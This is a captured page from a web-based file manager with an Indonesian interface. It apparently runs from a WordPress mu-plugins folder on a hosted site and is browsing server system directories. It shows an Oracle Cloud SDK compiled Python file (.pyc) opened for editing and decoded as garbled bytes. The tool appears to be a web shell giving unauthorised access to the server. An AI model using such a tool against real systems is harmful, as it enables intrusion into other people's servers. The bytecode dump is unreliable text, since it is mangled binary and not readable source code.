📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
cims
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/cims/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_user_details.pyc
a N��f@ � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Zd d!� Zd"S )#�CreateUserDetailsz) Details about creation of user. c K sd ddddddddd�| _ ddddddd d d�| _d| _d| _d| _d| _d| _d| _d| _d| _ dS )a8 Initializes a new CreateUserDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param compartment_id: The value to assign to the compartment_id property of this CreateUserDetails. :type compartment_id: str :param first_name: The value to assign to the first_name property of this CreateUserDetails. :type first_name: str :param last_name: The value to assign to the last_name property of this CreateUserDetails. :type last_name: str :param country: The value to assign to the country property of this CreateUserDetails. :type country: str :param csi: The value to assign to the csi property of this CreateUserDetails. :type csi: str :param phone: The value to assign to the phone property of this CreateUserDetails. :type phone: str :param timezone: The value to assign to the timezone property of this CreateUserDetails. :type timezone: str :param organization_name: The value to assign to the organization_name property of this CreateUserDetails. :type organization_name: str �str)�compartment_id� first_name� last_name�country�csi�phone�timezone�organization_name� compartmentId� firstName�lastNamer r r r �organizationNameN) � swagger_types� attribute_map�_compartment_id�_first_name� _last_name�_country�_csi�_phone� _timezone�_organization_name)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/cims/models/create_user_details.py�__init__ s4 '��zCreateUserDetails.__init__c C s | j S )z� **[Required]** Gets the compartment_id of this CreateUserDetails. The OCID of the tenancy. :return: The compartment_id of this CreateUserDetails. :rtype: str �r �r r r r! r U s z CreateUserDetails.compartment_idc C s || _ dS )z� Sets the compartment_id of this CreateUserDetails. The OCID of the tenancy. :param compartment_id: The compartment_id of this CreateUserDetails. :type: str Nr# )r r r r r! r a s c C s | j S )z� **[Required]** Gets the first_name of this CreateUserDetails. First name of the user. :return: The first_name of this CreateUserDetails. :rtype: str �r r$ r r r! r m s zCreateUserDetails.first_namec C s || _ dS )z� Sets the first_name of this CreateUserDetails. First name of the user. :param first_name: The first_name of this CreateUserDetails. :type: str Nr% )r r r r r! r y s c C s | j S )z� **[Required]** Gets the last_name of this CreateUserDetails. Last name of the user. :return: The last_name of this CreateUserDetails. :rtype: str �r r$ r r r! r � s zCreateUserDetails.last_namec C s || _ dS )z� Sets the last_name of this CreateUserDetails. Last name of the user. :param last_name: The last_name of this CreateUserDetails. :type: str Nr&